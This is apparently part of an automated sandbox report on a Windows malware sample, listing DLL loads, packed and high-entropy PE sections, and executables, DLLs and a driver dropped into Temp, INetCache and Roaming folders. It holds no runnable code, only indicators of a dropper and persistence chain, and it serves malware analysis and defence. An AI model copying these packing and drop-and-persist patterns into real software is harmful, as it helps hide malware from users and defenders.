                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: qtcore4.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: qtgui4.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: qtnetwork4.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: comn.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: libssl-1_1.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: libcrypto-1_1.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: samcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: dbghelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: pla.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: pdh.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: tdh.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: cabinet.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: wevtapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: shdocvw.dll
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: frweontwxli.51.drLNK file: ..\..\Roaming\altuninstall_test\ShortcutTaskAgent.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: 13s1HMkHKv.exeStatic file information: File size 2165760 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile opened: C:\Users\user\AppData\Local\Temp\msvcr80.dll
                          Source: 13s1HMkHKv.exeStatic PE information: Raw size of jfugtalk is bigger than: 0x100000 < 0x1a0e00
                          Source: Binary string: C:\Users\PC\Desktop\programms\1LOADER_PROXY\C#installer\ConsoleApp1\ConsoleApp1\obj\Release\net6.0\win-x64\ConsoleApp1.pdb source: rapes.exe, 0000000B.00000002.2491465283.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmp
                          Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbcccGCTL source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmp
                          Source: Binary string: C:\Users\PC\Desktop\programms\1LOADER_PROXY\C#installer\ConsoleApp1\ConsoleApp1\obj\Release\net6.0\win-x64\ConsoleApp1.pdbSHA256 source: rapes.exe, 0000000B.00000002.2491465283.00000000061F0000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeUnpacked PE file: 0.2.13s1HMkHKv.exe.a40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jfugtalk:EW;skzfxrkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jfugtalk:EW;skzfxrkw:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 4.2.rapes.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jfugtalk:EW;skzfxrkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jfugtalk:EW;skzfxrkw:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 11.2.rapes.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jfugtalk:EW;skzfxrkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jfugtalk:EW;skzfxrkw:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeUnpacked PE file: 12.2.s7MG2VL.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mxyvrfkq:EW;pvaimvim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mxyvrfkq:EW;pvaimvim:EW;.taggant:EW;
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeUnpacked PE file: 38.2.ps.exe.910000.0.unpack
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: ZqkKpwG[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x15e8f7
                          Source: ZqkKpwG.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x15e8f7
                          Source: 8sb9w_003.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x1569f7
                          Source: st22BJg[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x8fbdaf
                          Source: rapes.exe.0.drStatic PE information: real checksum: 0x212842 should be: 0x21bf9c
                          Source: yo7qmvz.exe.11.drStatic PE information: real checksum: 0x0 should be: 0xc0618
                          Source: eAzoDbY.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x15241b
                          Source: EZs3CZC.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x8671eb
                          Source: dx3hXS1.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x363b3
                          Source: QtGui4.dll.47.drStatic PE information: real checksum: 0x83959f should be: 0x838e21
                          Source: s7MG2VL.exe.11.drStatic PE information: real checksum: 0x202333 should be: 0x1ff8ea
                          Source: s7MG2VL[1].exe.11.drStatic PE information: real checksum: 0x202333 should be: 0x1ff8ea
                          Source: EZs3CZC[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x8671eb
                          Source: dx3hXS1[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x363b3
                          Source: st22BJg.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x8fbdaf
                          Source: 8sb9w_003[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x1569f7
                          Source: eAzoDbY[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0x15241b
                          Source: QtGui4.dll.48.drStatic PE information: real checksum: 0x83959f should be: 0x838e21
                          Source: ps.exe.31.drStatic PE information: real checksum: 0x0 should be: 0x1c7187
                          Source: 13s1HMkHKv.exeStatic PE information: real checksum: 0x212842 should be: 0x21bf9c
                          Source: file.exe.44.drStatic PE information: real checksum: 0x33302 should be: 0x87948d
                          Source: yo7qmvz[1].exe.11.drStatic PE information: real checksum: 0x0 should be: 0xc0618
                          Source: 13s1HMkHKv.exeStatic PE information: section name:
                          Source: 13s1HMkHKv.exeStatic PE information: section name: .idata
                          Source: 13s1HMkHKv.exeStatic PE information: section name:
                          Source: 13s1HMkHKv.exeStatic PE information: section name: jfugtalk
                          Source: 13s1HMkHKv.exeStatic PE information: section name: skzfxrkw
                          Source: 13s1HMkHKv.exeStatic PE information: section name: .taggant
                          Source: rapes.exe.0.drStatic PE information: section name:
                          Source: rapes.exe.0.drStatic PE information: section name: .idata
                          Source: rapes.exe.0.drStatic PE information: section name:
                          Source: rapes.exe.0.drStatic PE information: section name: jfugtalk
                          Source: rapes.exe.0.drStatic PE information: section name: skzfxrkw
                          Source: rapes.exe.0.drStatic PE information: section name: .taggant
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: .xdata
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: /4
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: /19
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: /32
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: /46
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: /65
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: /78
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: /90
                          Source: EZs3CZC[1].exe.11.drStatic PE information: section name: .symtab
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: .xdata
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: /4
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: /19
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: /32
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: /46
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: /65
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: /78
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: /90
                          Source: EZs3CZC.exe.11.drStatic PE information: section name: .symtab
                          Source: dx3hXS1[1].exe.11.drStatic PE information: section name: _RDATA
                          Source: dx3hXS1.exe.11.drStatic PE information: section name: _RDATA
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name:
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name: .idata
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name:
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name: mxyvrfkq
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name: pvaimvim
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name: .taggant
                          Source: s7MG2VL.exe.11.drStatic PE information: section name:
                          Source: s7MG2VL.exe.11.drStatic PE information: section name: .idata
                          Source: s7MG2VL.exe.11.drStatic PE information: section name:
                          Source: s7MG2VL.exe.11.drStatic PE information: section name: mxyvrfkq
                          Source: s7MG2VL.exe.11.drStatic PE information: section name: pvaimvim
                          Source: s7MG2VL.exe.11.drStatic PE information: section name: .taggant
                          Source: 8sb9w_003[1].exe.11.drStatic PE information: section name: ss0
                          Source: 8sb9w_003[1].exe.11.drStatic PE information: section name: ss1
                          Source: 8sb9w_003[1].exe.11.drStatic PE information: section name: ss2
                          Source: 8sb9w_003.exe.11.drStatic PE information: section name: ss0
                          Source: 8sb9w_003.exe.11.drStatic PE information: section name: ss1
                          Source: 8sb9w_003.exe.11.drStatic PE information: section name: ss2
                          Source: ps.exe.31.drStatic PE information: section name: cv0
                          Source: ps.exe.31.drStatic PE information: section name: cv1
                          Source: ps.exe.31.drStatic PE information: section name: cv2
                          Source: cls.exe.31.drStatic PE information: section name: ss0
                          Source: cls.exe.31.drStatic PE information: section name: ss1
                          Source: cls.exe.31.drStatic PE information: section name: ss2
                          Source: gvh50gjo_3616.sys.38.drStatic PE information: section name: vs0
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00249FC1 push ecx; ret 11_2_00249FD4
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C1DFCA push ecx; ret 15_2_00C1DFDD
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0045681C push ebx; iretd 17_2_00456823
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00456650 pushfd ; ret 17_2_00456675
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_004566DD push esp; retf 17_2_004566E6
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF04F7 push ebx; iretd 17_2_00BF04F9
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BF04DD push ebx; iretd 17_2_00BF04E3
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1DFCA push ecx; ret 17_2_00C1DFDD
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00BDA775 push es; iretd 17_2_00BDA776
                          Source: 13s1HMkHKv.exeStatic PE information: section name: entropy: 7.041526882327951
                          Source: 13s1HMkHKv.exeStatic PE information: section name: jfugtalk entropy: 7.953536978742279
                          Source: rapes.exe.0.drStatic PE information: section name: entropy: 7.041526882327951
                          Source: rapes.exe.0.drStatic PE information: section name: jfugtalk entropy: 7.953536978742279
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name: entropy: 7.081477890280845
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name: mxyvrfkq entropy: 7.95418402305297
                          Source: s7MG2VL.exe.11.drStatic PE information: section name: entropy: 7.081477890280845
                          Source: s7MG2VL.exe.11.drStatic PE information: section name: mxyvrfkq entropy: 7.95418402305297
                          Source: ZqkKpwG[1].exe.11.drStatic PE information: section name: .text entropy: 7.09207256696417
                          Source: ZqkKpwG.exe.11.drStatic PE information: section name: .text entropy: 7.09207256696417
                          Source: eAzoDbY[1].exe.11.drStatic PE information: section name: .text entropy: 7.09207256696417
                          Source: eAzoDbY.exe.11.drStatic PE information: section name: .text entropy: 7.09207256696417
                          Source: 8sb9w_003[1].exe.11.drStatic PE information: section name: ss2 entropy: 7.9915358801939895
                          Source: 8sb9w_003.exe.11.drStatic PE information: section name: ss2 entropy: 7.9915358801939895
                          Source: ps.exe.31.drStatic PE information: section name: cv2 entropy: 7.988761094076266
                          Source: cls.exe.31.drStatic PE information: section name: ss2 entropy: 7.8896171543619635
                          Source: gvh50gjo_3616.sys.38.drStatic PE information: section name: .text entropy: 7.126561604240753
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeFile created: C:\Windows\Temp\gvh50gjo_3616.sys
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dx3hXS1[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\eAzoDbY[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\QtGui4.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s7MG2VL[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ZqkKpwG[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\yo7qmvz[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\Comn.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\msvcr80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\EZs3CZC[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\QtNetwork4.dllJump to dropped file
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\QtGui4.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeJump to dropped file
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeFile created: C:\Windows\Temp\gvh50gjo_3616.sysJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\8sb9w_003[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\msvcr80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\QtCore4.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\Temp\msvcp80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeFile created: C:\Users\user\AppData\Roaming\altuninstall_test\QtNetwork4.dllJump to dropped file
